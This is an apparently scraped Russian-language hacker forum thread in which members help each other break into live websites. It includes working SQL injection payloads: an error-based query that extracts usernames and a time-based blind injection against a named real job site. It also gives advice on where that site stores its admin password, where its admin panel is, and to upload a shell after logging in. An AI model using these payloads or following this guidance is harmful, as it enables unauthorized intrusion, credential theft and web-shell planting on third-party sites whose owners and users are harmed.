 |
|
11.10.2015, 13:16
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от kacergei
↑
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация:
http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте
конфиги веб сервера
|
|
|
11.10.2015, 15:01
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Перепробывал различные пути (почти все) с прикрепленной темы тут на форуме ( Default *log, *conf files locations), так же на rdot'e смотрел, а может быть такое что с локалки тянуться файлы?
|
|
|
|
11.10.2015, 18:18
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 293
С нами:
6747446
Репутация:
32
|
|
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Код:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ? |
|
|
|
11.10.2015, 18:39
|
|
Познающий
Регистрация: 09.10.2015
Сообщений: 54
С нами:
5576726
Репутация:
10
|
|
Код:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Код:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE |
|
|
|
11.10.2015, 18:49
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от WallHack
↑
Кручу error-based руками
Такой запрос возвращает данные из колонки username
Код:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
Можно вывести сразу id, username ?
select id,0x3a,username from users limit 0,1
|
|
|
|
11.10.2015, 19:33
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 293
С нами:
6747446
Репутация:
32
|
|
Сообщение от MaxFast
↑
select id,0x3a,username from users limit 0,1
Выводит: Operand should contain 1 column(s)
Код:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
|
|
|
|
11.10.2015, 20:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от WallHack
↑
Выводит: Operand should contain 1 column(s)
Код:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
объедините в concat
|
|
|
|
11.10.2015, 20:26
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от Waki
↑
Код:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Код:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC
Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
|
|
|
|
11.10.2015, 21:34
|
|
Познающий
Регистрация: 09.10.2015
Сообщений: 54
С нами:
5576726
Репутация:
10
|
|
Сообщение от Br@!ns
↑
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.
|
|
|
|
12.10.2015, 04:31
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от Waki
↑
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.
все стандартно, методом перебора интересных названий таблиц. Только скулю другую нашел, с выводом
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
